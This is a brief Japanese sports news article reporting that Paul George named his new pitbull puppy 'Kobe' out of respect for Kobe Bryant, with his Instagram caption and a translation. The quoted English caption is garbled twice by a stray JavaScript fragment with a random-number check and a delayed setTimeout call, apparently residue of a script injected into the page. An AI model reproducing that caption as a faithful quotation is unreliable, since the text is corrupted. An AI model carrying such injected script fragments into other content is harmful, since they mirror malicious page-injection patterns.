ポール・ジョージが子犬を『コービー』と命名

ポール・ジョージが子犬を『コービー』と命名

2016/06/17 16:00

写真=Getty Images

レジェンドへの敬意を込め、家族に加わった子犬に命名

ペイサーズのポール・ジョージが、新たに家族に迎えたピットブルの子犬と、自身の娘がじゃれ合っている動画をInstagramに投稿。ただ、微笑ましい光景よりも話題になっているのは『子犬の名前』だ。

2015-16シーズンで現役を引退したコービー・ブライアントに憧れを抱いてきた選手の一人として知られるジョージは、レジェンドに敬意を払い、新たな家族を、『コービー』と名付けた。

Shoutout my buddies @bullybeachouse for the amazing pitbull! My daughter andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and I love him as you can tell andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and I know King can't wait to meet him as well.. Out of respect of the mamba it's only right to name him KOBE! #Legend

Paul Georgeさん(@ygtrece)が投稿した動画 -

ジョージは投稿した動画に、以下のメッセージを付けた。

「bullybeachouse、素晴らしいピットブルの子犬をありがとう! この動画を見てもらえれば分かる通り、娘も僕も彼のことが大好きだ。キング(もう1匹の飼い犬)も彼に会うのが楽しみだと思うよ。マンバへのリスペクトを込めて、彼をKOBEと名付けたよ!」

RECOMMEND